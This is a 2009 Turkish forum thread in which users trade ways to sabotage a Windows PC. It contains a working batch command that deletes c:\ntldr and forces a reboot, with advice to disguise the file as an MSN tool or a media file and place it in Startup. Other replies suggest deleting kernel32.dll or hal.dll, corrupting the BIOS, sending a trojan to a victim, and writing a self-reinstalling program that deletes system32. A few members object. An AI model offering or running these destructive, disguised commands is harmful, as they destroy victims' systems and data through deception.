bir bilgisayara virüs bulaştırmadan masaüstü de açılacak halde bilgisayar nasıl bozulur
tam anlatamadım ama siz yöntemleri yazarsanız bunun gibi veya değil yazarım
teşekkürler
pc bozma
- 1
- 2
bilgisayarı sistem üzerinden bozmanın en sağlam yolu debug programı ile biosu bozmak ama bu sistemi tamamen açılmaz hale getirir eğer masaustune kadar gelsin diosan explorer.exe yi bozman yeterli olur sanırım windows hiç açılmasın dersen de kernel32.dll yada hal.dll yi silersin ama windows bunların surekli yedeklerini alır bunlarıda bulup silmen lazım
_cypher_bilgisayarı sistem üzerinden bozmanın en sağlam yolu debug programı ile biosu bozmak ama bu sistemi tamamen açılmaz hale getirir eğer masaustune kadar gelsin diosan explorer.exe yi bozman yeterli olur sanırım windows hiç açılmasın dersen de kernel32.dll yada hal.dll yi silersin ama windows bunların surekli yedeklerini alır bunlarıda bulup silmen lazımbaşka bir bilgisayarsa ama kendim silemiyeceksem
Böyle bir soruyu ve cevaplamayı pek doğru bulmuyorum.
trojan kodlarını netten al .bat dosyası olarak trojanı hazırla rarlayıp karsı tarafa yolla bir şekilde tıklamasını sağla
AdRaMiTizarar verici bişey olsun istemiyorum zatenBozmak istemendeki amac ?
benim bilgisayarımı bozdukları için yöntemleri öğrenmek istiyorum
carl246trojan kodlarını netten al .bat dosyası olarak trojanı hazırla rarlayıp karsı tarafa yolla bir şekilde tıklamasını sağvirüs bulaştırmadan demiştim ama
öğrenmek istiyorsan ilk önce deep freeze 6 programını kur sonra kendi pc ni istediğin gibi çökert tabi deep freeze 6 aktif olan pc de herşey geçicidir yani pc de yeniden başlayınca herşey eski haline döner öğrendikten sonra deep freeze 6 yı pasif edip kaldırırsın
chip forumun kuruluş amacı insanlara yardım etmek yapıcı olmaktır bakıyorumda cogu arkadasımız "bozma konusunda" desteğini esirgemememiş yapıcı olun arkadaşlar yıkıcı değil
yönetim mesaj içeriğini görüyorsa bişeyler yapsın bence !!!
eoloschip forumun kuruluş amacı insanlara yardım etmek yapıcı olmaktır bakıyorumda cogu arkadasımız "bozma konusunda" desteğini esirgemememiş yapıcı olun arkadaşlar yıkıcı değilkimseye birşey yaptıgım yok kiyönetim mesaj içeriğini görüyorsa bişeyler yapsın bence !!!
nasıl tamir etmeyi öğrenmeye çalışıyrosak bozmayı da öğrenmeliyimzarar verici virüs bulaştırıcı bir daha düzeltilmeyecek şeyler de sormadım
Son Düzenleme: black rose ~ 19 Mayıs 2009 21:40
Not Defterini açıp
- [ Tüm kodu seç ] [ Yeni Pencerede Göster ]
cd.. cd.. attrib -s -h -r -a c:\ntldr del c:\ntldr shutdown -r
.bat olarak kaydet.. Örn : Coklu_Msn.bat gibi Daha Sonra Startup'a Yerleştir . Pc açılnca direkt çalışacak .. bir kac sn sonra pc restart yapıcak .. Ama Çoktan Pc bozulmuş olucak :)
eoloschip forumun kuruluş amacı insanlara yardım etmek yapıcı olmaktır bakıyorumda cogu arkadasımız "bozma konusunda" desteğini esirgemememiş yapıcı olun arkadaşlar yıkıcı değilben sadece nasıl yapıldıgı anlattım bilgi olsun diye konuyu açan arkadası yapacaksın yoksa seni öldürürüm diye zorlamadım sonuçta sorumluluk bu yöntemleri uygulayan kişiye aittiryönetim mesaj içeriğini görüyorsa bişeyler yapsın bence !!!
bektashNot Defterini açıpneresini bozuyor ?Bunu Not defterinde Farklı Kaydet Deyip Program resim müzik vs vs İsimlendirerek
.bat olarak kaydet.. Örn : Coklu_Msn.bat gibi Daha Sonra Startup'a Yerleştir . Pc açılnca direkt çalışacak .. bir kac sn sonra pc restart yapıcak .. Ama Çoktan Pc bozulmuş olucak :)
Kökten Windows'u bozuyor...
Windows NT dizini Yani Pc tamamen infilak ediyor . Çözümü Yeniden Yükleme(Formattır)
bektashWindows NT dizini Yani Pc tamamen infilak ediyor . Çözümü Yeniden Yükleme(Formattır)merak ettim şimdi DF6 ya güvenip çalıştırayım diyorum ama
ya birde eski haline dönmesseSon Düzenleme: Kapalı Hesap (80046) ~ 19 Mayıs 2009 22:05
denedim 30 saniye geriye doğru sayımdan sonra pc restart oldu DF6 olduğu için pc eski haline döndü bektash paylasım için saol bu arada konuyu gören arkadaslar sakın kendiniz denemeyin
Lütfen Deep Freeze Kullanmayanlar Denemesin !!!! Fazla Merakta Etmeyin :) Rica Ederim Carl246 .. Denedik Gördük Sorun Yok :)
:) Gerçekten iginç bir konu.. Bu bilgiyi kötü birşey için kullanacaksan, kullanma derim.. Gerisi vicdanına kalmış :)
Şimdi gelelim çözüme..
Arkadaşım..
Bak basit, basic br visual basic bilgin olsa yeterli..
Yapman gereken şey, bir program yazmak ve bu program şöyle yapacak..
İlk önce çalıştığında system32 yi ya da herneyse silecek, sonrasında da kendini start up a kopyalıyacak..
Böylece ne oldu.
Program çalıştı, bilg. sistem dosyaları silindiinden error verdi, ve eğer arkadaşın dedikleri doğruysa yani otomartik güncelliyorsa software kendini,
tekrar bilgisayar açıldığında, programımız kendini startup(başlangıç) a kaydettiği için tekrar dosyalar silinecektir..
İşte bu şekilde kurban ve yazdığın program arasında kısır bir döngü oluşturabilirsin..
Fakat bu işin çözülmesi için tek çözüm format atmaktır arkadaşım..
:) :) :)
Sakın kötülük yapma ama..
Program konusunda da ne için kullanacağını bilmediğim için maaledef yardımcı olamıyacam :D
bektashNot Defterini açıpGüvenli modda açıp kolayca düzeltilebilecek bir probleme benziyorBunu Not defterinde Farklı Kaydet Deyip Program resim müzik vs vs İsimlendirerek
tuncabGüvenli modda açıp kolayca düzeltilebilecek bir probleme benziyorsystemde DF6 yoksa sakın deneme denersen pc açılırken tahminim system32 bir .exe yada .dll bulumamadı diye bir hata alırsın
ben denedim systemde DF6 olduğu öyle bir hata gelmedi ve herşey eski haline döndü zaten ondan tahminim diye şöyle olur diye söyledim
- 1
- 2